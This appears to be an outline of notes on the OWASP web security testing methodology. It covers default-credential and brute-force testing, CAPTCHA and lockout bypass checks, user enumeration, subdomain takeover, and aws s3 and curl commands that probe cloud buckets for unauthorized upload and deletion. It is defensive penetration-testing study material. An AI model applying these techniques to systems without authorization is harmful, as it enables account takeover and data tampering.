- Review and assess new user accounts and if they are created with any defaults or identifiable patterns.
-
How to test
-
Testing for Default Credentials of Common Applications
- Try the following usernames - “admin”, “administrator”, “root”, “system”, “guest”, “operator”, or “super”.
- Application administrative users are often named after the application or organization.
- When performing a test for a customer, attempt using names of contacts you have received as usernames with any common passwords.
- Attempt using all the above usernames with blank passwords.
- Review the page source and JavaScript either through a proxy or by viewing the source.
- Look for account names and passwords written in comments in the source code.
-
Testing for Default Password of New Accounts
- Looking at the User Registration page may help to determine the expected format and minimum or maximum length of the application usernames and passwords.
- Try to extrapolate from the application how usernames are generated.
- Try to determine if the system generated password is predictable.
- If you have identified the correct naming convention for the user name, try to “brute force”
- Attempt using all the above usernames with blank passwords or using the username also as password value.
-
Gray-Box Testing
- Talk to the IT personnel to determine which passwords they use for administrative access and how administration of the application is undertaken.
- Ask IT personnel if default passwords are changed and if default user accounts are disabled.
- Examine the user database for default credentials as described in the black-box testing section.
- Examine the code for hard coded usernames and passwords.
- Check for configuration files that contain usernames and passwords
- Examine the password policy and, if the application generates its own passwords for new users,
-
Tools
- Burp Intruder
- THC Hydra
- Nikto
-
References
- CIRT
-
Testing for Weak Lock Out Mechanism
-
Objectives
- Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing.
- Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.
-
How to Test
-
Lockout Mechanism
- Log in with incorrect password 3 times
- log in with correct password so the lockout mechanism doesn’t trigger after 3
incorrect attemps.
- Increase the wrong attemps till you reach the lock out status.
- After lockout time finished login with your password
- To evaluate CAPTCHA effectiveness:
- attempt automating solutions depending on difficulty.
- submit request without solving CAPTCHA
- submit request with intentional CAPTCHA challenge failure
- Attempt to submit request without solving CAPTCHA and delete any params that verify you didn't solve CAPTCHA
- Attempt to fuzz CAPTCHA data entry points
- Check if the solution to the CAPTCHA might be the alt-text of the image(s)
- Attempt to re-submit previously identified known good responses
- Check if clearing cookies causes the CAPTCHA to be bypassed
- If the CAPTCHA is part of a multi-step process, attempt to simply access or complete a step beyond the CAPTCHA
- Check for alternative methods that might not have CAPTCHA enforced
-
Unlock Mechanism
- The unlock link should be a unique one time link, to stop an attacker from guessing or replaying the link and performing brute force attacks in batches.
-
Remediation
- 1. Time-based lockout and unlock.
- 2. Self-service unlock (sends unlock email to registered email address).
- 3. Manual administrator unlock.
- 4. Manual administrator unlock with positive user identification.
-
implementing an account lockout mechanism
- What is the risk of brute force password guessing against the application?
- Is a CAPTCHA sufficient to mitigate this risk?
- s a client-side lockout mechanism being used (e.g., JavaScript)?
- Number of unsuccessful log in attempts before lockout.
- How will accounts be unlocked?
- Manually by an administrator
- After a period of time
- Via a self-service mechanism
-
References
- See the OWASP article on Brute Force Attacks.
- Forgot Password CS.
-
Testing for Bypassing Authentication Schema
-
Objectives
- Ensure that authentication is applied across all services that require it.
-
How to Test
-
Black-Box Testing
- Direct Page Request
- Attempt to directly access a protected page
- Parameter Modification
- A user could modify these parameters to gain access to the protected areas without providing valid credentials
- Session ID Prediction
- Predictable session id may gain the attacker access to the application
- SQL Injection (HTML Form Authentication)
-
Gray-Box Testing
- Retrieving the source code form anywhere like github for instance so the attack can test these techniques on it.
-
Tools
- WebGoat
- OWASP Zed Attack Proxy (ZAP)
-
References
- Mark Roxberry: “PHPBB 2.0.13 vulnerability”
- David Endler: “Session ID Brute Force Exploitation and Prediction”
-
Testing for Vulnerable Remember Password
-
Objectives
- Validate that the generated session is managed securely
-
How to Test
- Credentials shouldn’t be stored in any way in the client-side application, and should be substitued by tokens generated server�side.
-
Automatically inject the user’s credentials that can be abused by:
- ClickJacking attacks.
- CSRF attacks.
-
Remediation
- Follow session management good practices.
- Ensure that no credentials are stored in clear text, they should be stored server-side and follow good password storage practices
-
Testing for Browser Cache Weaknesses
-
Objectives
- Review if the application stores sensitive information on the client-side.
- Review if access can occur without authorization.
-
How to Test
-
Browser History
- Entering sensitive information into the application and logging out.
Then click "back" button to see if he can access without authentication
- The Back button can be stopped from showing sensitive data.
- Delivering the page over HTTPS.
- Setting Cache-Control: must-revalidate
-
Browser Cache
- Here testers check that the application does not leak any sensitive data into the browser cache.
- they can use a proxy ZAP and search through the server responses for sensitive information.
- Check the HTTP response headers
- Cache-Control: no-cache, no-store
- Expires: 0
- Pragma: no-cache
- Cache-Control: must-revalidate, max-age=0, s-maxage=0
- Reviewing Cached Information
- Cache details are also available via developer tools in most modern browsers
- Check Handling for Mobile Browsers
- Therefore, testers should start a new
browsing session re-test or separately test the concepts outlined above.
-
Gray-Box Testing
- The methodology for testing is equivalent to the black-box case
-
Tools
- OWASP Zed Attack Proxy
-
References
- Caching in HTTP
-
Testing for Weak Password Policy
-
Objectives
- Test the app aginst the brute force and password guessing attacks by available dictionaries.
-
How to Test
- What characters are permitted and forbidden for use within a password?
- How often can a user change their password?
- When must a user change their password?
- How often can a user reuse a password?
- How different must the next password be from the last password?
- Is the user prevented from using his username or other account information (such as first or last name) in the
password?
- What are the minimum and maximum password lengths that can be set, and are they appropriate for the sensitivity
of the account and application?
- Is it possible set common passwords such as Password1 or 123456 ?
-
Remediation
- introduce additional authentication controls (i.e. two-factor authentication) or introduce a strong password policy.
-
References
- Brute Force Attacks
-
Testing for Weak Security Question Answer
-
Objectives
- Determine the complexity and how straight-forward the questions are.
- Assess possible user answers and brute force capabilities.
-
How to Test
-
Testing for Weak Pre-generated Questions
- Try to obtain a list of security questions by creating a new account or by following the
process.
- Testing for Weak Self-Generated Questions
-
Testing for Brute-forcible Answers
- number of questions that need to
be answered.
- Could the answers be obtained by a simple Google search or with social engineering attack?
- Does the application allow the end user to choose the question that needs to be answered?
- A “public” answer; for example something with google search
- A factual answer such as a “first school”
- Determine how many guesses you have if possible.
-
References
- The Curse of the Secret Question
- The OWASP Security Questions Cheat Sheet
-
Testing for Weak Reset Functionalities
-
Objectives
- Determine the resistance of the application to subversion of the account change process allowing someone to
change the password of an account.
- Determine the resistance of the passwords reset functionality against guessing or bypassing.
-
How to Test
- If any user or administrator can change password for account they don't own
- If the user can change password of any other user.
- if the password change or reset process is vulnerable to CSRF.
-
Test Password Reset
- What information is required to reset the password?
- How are reset passwords communicated to the user?
- Are reset passwords generated randomly?
- Is the reset password functionality requesting confirmation before changing the password?
-
Test Password Change
- Is the old password requested to complete the change?
-
Remediation
- requiring users to re-authenticate or presenting the user with confirmation screens during the process.
-
References
- OWASP Forgot Password Cheat Sheet
-
Testing for Weaker Authentication in Alternative Channel
-
Objectives
- Identify alternative authentication channels.
- Assess the security measures used and if any bypasses exists on the alternative channels.
-
How to Test
-
Understand the Primary Mechanism
- how accounts are issued, created or
changed and how passwords are recovered, reset, or changed.
-
Identify Other Channels
- Reading site content, especially the home page, contact us, help pages, support articles and FAQs, T&Cs, privacy
notices, the robots.txt file and any sitemap.xml files.
- Searching HTTP proxy logs, such as
“mobile”, “android”, blackberry”, “ipad”, “iphone”, “mobile app”, “e-reader”, “wireless”, “auth”, “sso”, “single sign on”
in URL paths and body content.
- Using Dorks to find any other authentication channels
-
Enumerate Authentication Functionality
- While enumerating these it is worth taking note of how session management is undertaken
-
Review and Test
- If testing is permitted and authorized, all the other authentication tests in this guide should then be performed, and compared
against the primary channel
-
Remediation
- Ensure a consistent authentication policy is applied across all channels so that they are equally secure
-
4.3 Identity Management Testing
-
Test Role Definitions
-
Objectives
- Identify and document roles used by the application
- Attempt to switch, change, or access another role
- Review the granularity of the roles and the needs behind the permissions given
-
How to test
-
Roles Identification
- Application documentation
- Guidance by the developers
- Fuzz possible roles
- cookie variable
- account variable
- hidden directories
- switching to well known users
-
Switching to Available Roles
- the tester needs to test and validate that they can access the available roles
- Review Roles Permissions
-
Tools
- - Burp’s Autorize extension
- - ZAP’s Access Control Testing add-on
-
Test User Registration Process
-
Objectives
- - Verify that the identity requirements for user registration are aligned with business and security requirements
- - Validate the registration process.
-
How to Test
- 1. Can anyone register for access?
- 2. Are registrations vetted by a human prior to provisioning, or are they automatically granted if the criteria are met?
- 3. Can the same person or identity register multiple times?
- 4. Can users register for different roles or permissions?
- 5. What proof of identity is required for a registration to be successful?
- 6. Are registered identities verified?
-
Validate the registration process
- 1. Can identity information be easily forged or faked?
- 2. Can the exchange of identity information be manipulated during registration?
-
Tools
- A HTTP proxy
-
Test Account Provisioning Process
-
Objectives
- Verify which accounts may provision other accounts and of what type
-
How to Test
- Determine which roles are able to provision users and what sort of accounts they can provision.
- Is there any verification, vetting and authorization of provisioning requests?
- Is there any verification, vetting and authorization of de-provisioning requests?
- Can an administrator provision other administrators or just users?
- Can an administrator or other user provision accounts with privileges greater than their own?
- Can an administrator or user de-provision themselves?
- How are the files or resources owned by the de-provisioned user managed? Are they deleted? Is access transferred?
-
Tools
- HTTP proxy
-
Account Enumeration and Guessable User Account
-
Objectives
- - Review processes that pertain to user identification (e.g. registration, login, etc.).
- - Enumerate users where possible through response analysis.
-
HTTP Response Message
- Record the server answer when you submit a valid user ID and valid password.
- the tester should try to insert a valid user ID and a wrong password
- the tester should try to insert an invalid user ID and a wrong password and record the server answer
-
Other Ways to Enumerate Users
- Analyzing the Error Code Received on Login Pages
- Analyzing URLs and URLs Re-directions
- URI Probing
- Analyzing Web Page Titles
- Analyzing a Message Received from a Recovery Facility
- Friendly 404 Error Message
-
Tools
- OWASP Zed Attack Proxy (ZAP)
- curl
- PERL
-
Testing for Weak or Unenforced Username Policy
-
Objectives
- - Determine whether a consistent account name structure renders the application vulnerable to account enumeration.
- - Determine whether the application’s error messages permit account enumeration.
-
How to Test
- - Determine the structure of account names.
- - Evaluate the application’s response to valid and invalid account names.
- - Use different responses to valid and invalid account names to enumerate valid account names.
- - Use account name dictionaries to enumerate valid account names.
-
4.2 Configuration and Deployment Management Testing
-
Test Network Infrastructure Configuration
-
Objectives
- Review the applications’ configurations set across the network and validate that they are not vulnerable.
- Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities
-
Administrative Tools
- FTP servers
- WebDAV
- network file systems
-
Test Application Platform Configuration
-
Objectives
- Ensure that defaults and known files have been removed.
- Validate that no debugging code or extensions are left in the production environments.
- Review the logging mechanisms set in place for the application.
-
Black-Box Testing
- Sample and Known Files and Directories
- Comment Review
-
Gray-Box Testing
-
Configuration Review
- Only enable server modules (ISAPI extensions in the case of IIS) that are needed for the application
- Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages
- Make sure that the server software runs with minimized privileges in the operating system
- Make sure the server software properly logs both legitimate access and errors.
- Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks
- Never grant non-administrative identities access to applicationHost.config, redirection.config, and administration.config
- Never share out applicationHost.config, redirection.config, and administration.config on the network
- Keep in mind that all users can read .NET Framework machine.config and root web.config files by default
- Encrypt sensitive information that should be read by the IIS
- Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config
- Use a separate identity to publish applicationHost.config to the share
- Use a strong password when exporting the encryption keys
- Maintain restricted access to the share containing the shared configuration and encryption keys
- Consider protecting this share with firewall rules and IPsec policies
-
Logging
- 1. Do the logs contain sensitive information?
- 2. Are the logs stored in a dedicated server?
- 3. Can log usage generate a Denial of Service condition?
- 4. How are they rotated? Are logs kept for the sufficient time?
- 5. How are logs reviewed? Can administrators use these reviews to detect targeted attacks?
- 6. How are log backups preserved?
- 7. Is the data being logged data validated (min/max length, chars etc) prior to being logged?
-
Log Location
- Consequently, it is wiser to keep logs in a separate location and not in the web server itself
- Log Storage
-
Log Rotation
- Logs are kept for the time defined in the security policy, not more and not less.
- Logs are compressed once rotated
- File system permission of rotated log files are the same that those of the log files itself
-
Log Access Control
- Event log information should never be visible to end users
-
Log Review
- In order to analyze web server attacks the error log files of the server need to be analyzed
-
References
- Logging Cheatsheet
-
Test File Extensions Handling for Sensitive Information
-
Objectives
- Dirbust sensitive file extensions, or extensions that might contain raw data
- Validate that no system framework bypasses exist on the rules set
-
How to test
-
Forced Browsing
- Submit requests with different file extensions and verify how they are handled
- File Upload
-
Tools
- wget
- curl
- google for “web mirroring tools”
-
Old Backup and Unreferenced Files for Sensitive Information
-
Objectives
- Find and analyse unreferenced files that might contain sensitive information
-
How to test
- Inference from the Naming Scheme Used for Published Content
-
Other Clues in Published Content
- Comments
- robots file
- HTML forms
-
Blind Guessing
- Identify the file extensions in use within known areas of the application
- For each file identified through other enumeration techniques, create a custom wordlist derived from that filename
-
Server Vulnerabilities and Misconfiguration
- Apache ?M=D directory listing vulnerability.
- Various IIS script source disclosure vulnerabilities.
- IIS WebDAV directory listing vulnerabilities.
-
Publicly Available Information
- Pages that used to be referenced may still appear in the archives of Internet search engines
- Google and Yahoo keep cached versions of pages
- Content that is not referenced from within a target application
-
Filename Filter Bypass
- - Remove incompatible characters
- - Convert spaces to underscores
- - Take the first six characters of the basename
- - Add ~<digit> which is used to distinguish files with names using the same six initial characters
- - This convention changes after the first 3 cname ollisions
- - Truncate file extension to three characters
- - Make all the characters uppercase
-
Remediation
- Editing files in-place on the web server or application server file systems
- Carefully check any other activity performed on file systems exposed by the web server
- Appropriate configuration management policies should help prevent obsolete and un-referenced files.
-
Tools
- Nessus
- Nikto2
- Web spider tools
- wget
- Wget for Windows
- Sam Spade
- Spike proxy includes a web site crawler function
- Xenu
- curl
-
Enumerate Infrastructure and Application Admin Interfaces
-
Objectives
- Identify hidden administrator interfaces and functionality
-
Black-Box Testing
- - Directory and file Enum using Google dorking.
- - Using automation with tool related to directories bruteforcing
- - Comments and links in source code.
- - Publicly available information. Many applications such as WordPress have default administrative interfaces
- - Alternative server port. the uncommon ones.
- - Parameter tampering. A GET or POST parameter or a cookie variable may be required to enable the administrator functionality.
-
Gray-Box Testing
- Each web framework may have its own admin default pages or path
-
Tools
- OWASP ZAP
- THC-HYDRA
-
Test HTTP Methods
-
Objectives
- Enumerate supported HTTP methods.
- Test for access control bypass.
- Test XST vulnerabilities.
- Test HTTP method overriding techniques
-
How to test
- Discover the Supported Methods
- Testing for Access Control Bypass
- Testing for Cross-Site Tracing Potential
- Testing for HTTP Method Overriding
-
Tools
- Ncat
- cURL
- nmap http-methods NSE script
- w3af plugin htaccess_methods
-
Test HTTP Strict Transport Security
-
Objectives
- Review the HSTS header and its validity
-
How to test
- The presence of the HSTS header can be confirmed by examining the server’s response through an intercepting proxy or by using curl
-
Test RIA Cross Domain Policy
-
Objectives
- Review and validate the policy files
-
Testing for RIA Policy Files Weakness
- To test for RIA policy file weakness the tester should try to retrieve the policy files crossdomain.xml & clientaccesspolicy.xml from the application’s root, and from every folder found.
-
Tools
- - Nikto
- - OWASP Zed Attack Proxy Project
- - W3af
-
Test File Permission
-
Objectives
- Review and identify any rogue file permissions
-
How to test
- In Linux, use ls command to check the file permissions
-
Test for Subdomain Takeover
-
Objectives
- Enumerate all possible domains
- Identify forgotten or misconfigured domains
-
How to test
- Using the dig command the tester looks for the following DNS server response messages
- Testing DNS A, CNAME Record Subdomain Takeover
- Identify which DNS resource records are dead and point to
- performs a whois database lookup and identifies GitHub as the service provider
-
Tools
- dig - man page
- recon-ng - Web Reconnaissance framework
- theHarvester - OSINT intelligence gathering tool
- Sublist3r - OSINT subdomain enumeration tool
- dnsrecon - DNS Enumeration Script
- OWASP Amass DNS enumeration
-
Test Cloud Storage
-
Objectives
- Assess that the access control configuration for the storage services is properly in place.
-
How to Test
- curl -X GET https://<cloud-storage-service>/<object>
- curl -X PUT -d 'test' 'https://<cloud-storage-service>/test.txt’
-
Testing for Amazon S3 Bucket Misconfiguration
- Identify Bucket URL
-
Testing with AWS-CLI
- lists all the objects of the bucket when it is configured public
- aws s3 ls s3://<bucket-name>
- upload a file
- aws s3 cp arbitrary-file s3://bucket-name/path-to-save
- shows the result when the upload has been successful
- $ aws s3 cp test.txt s3://bucket-name/test.txt
- shows the result when the upload has failed
- $ aws s3 cp test.txt s3://bucket-name/test.txt
- remove an object
- aws s3 rm s3://bucket-name/object-to-remove
-
4.1 Information Gathering
-
Conduct Search Engine Discovery Reconnaissance for Information Leakage
-
Objectives
- Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization’s website) or indirectly (via third-party services).
-
How to Test
- network diagrams and configurations;
- archived posts and emails by administrators or other key staff;
- logon procedures and username formats;
- usernames, passwords, and private keys;
- third-party, or cloud service configuration files;
- revealing error message content
- development, test, User Acceptance Testing (UAT), and staging versions of sites.
-
Search Engines
- Google
- Bing
- DuckDuckGo
- Shodan
- Wayback Machine
-
Search Operators
- site:
- inurl:
- intitle:
- intext:
- filetype:
- cache:
-
Remediation
- Carefully consider the sensitivity of design and configuration information before it is posted online.
- Periodically review the sensitivity of existing design and configuration information that is posted online
-
Fingerprint Web Server
-
Objectives
- Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.
-
How to Test
-
Banner Grabbing
- sending an HTTP request to the web server and examining its response header
-
Sending Malformed Requests
- the response to a request for the non-existent method SANTA CLAUS
-
Using Automated Scanning Tools
- Nikto
- Netcraft
- NMAP
-
Remediation
- Ensuring that web servers are kept up-to-date with the latest software and security patches
- Using a hardened reverse proxy server to create an additional layer of security
- Obscuring web server information in headers, such as with Apache’s mod_headers module.
-
Review Webserver Metafiles for Information Leakage
-
Objectives
- Identify hidden or obfuscated paths and functionality through the analysis of metadata files.
- Extract and map other information that could lead to better understanding of the systems at hand
-
How to test
- Robots.txt
- META Tags
- Sitemaps
- Security TXT
- Humans TXT
- .well-known Information Sources
-
Tools
- Browser
- curl
- wget
- Burp Suite
- ZAP
-
Enumerate Applications on Webserver
-
Objectives
- Enumerate the applications within scope that exist on a web server.
-
How to test
-
Different Base URL
- probe for URLs which might be likely candidates for non-published applications
-
Non-standard Ports
- determine what services are bound to them
-
Virtual Hosts
- DNS Zone Transfers
- Web-based DNS Searches
- Reverse-IP Services
-
Tools
- DNS lookup tools such as nslookup , dig and similar
- Search engines
- Nmap
- Nessus Vulnerability Scanner
- Nikto
-
Review Webpage Content for Information Leakage
-
Objectives
- Review webpage comments and metadata to find any information leakage
- Gather JavaScript files and review the JS code to better understand the application and to find any information leakage
- Identify if source map files or other front-end debug files exist
-
How to test
- Review webpage comments and metadata
- Identifying JavaScript Code and Gathering JavaScript Files
- Identifying Source Map Files
-
Tools
- Wget
- Browser
- Eyeballs
- Curl
- Burp Suite
- Waybackurls
- Google Maps API Scanner
-
Identify Application Entry Points
-
Objectives
- Identify possible entry and injection points through request and response analysis
-
How to test
-
Black-Box Testing
- GET and POST reqeusts
-
Gray-Box Testing
- The Attack Surface Detector (ASD) tool investigates the source code and uncovers the endpoints of a web application
-
Tools
- OWASP Zed Attack Proxy
- Burp Suite
- Fiddler
-
Map Execution Paths Through Application
-
Objectives
- Map the target application and understand the principal workflows.
-
How to test
- Code Review
-
Automatic Spidering with ZAP
- Spider
- AJAX Spider
- OpenAPI Support
-
Tools
- Zed Attack Proxy
- List of spreadsheet software
- Diagramming software
-
Fingerprint Web Application Framework
-
Objectives
- Fingerprint the components being used by the web applications.
-
How to test
-
Black-Box Testing
- - HTTP headers
- - Cookies
- - HTML source code
- - Specific files and folders
- - File extensions
- - Error messages
-
Tools
- Wappalyzer
- WhatWeb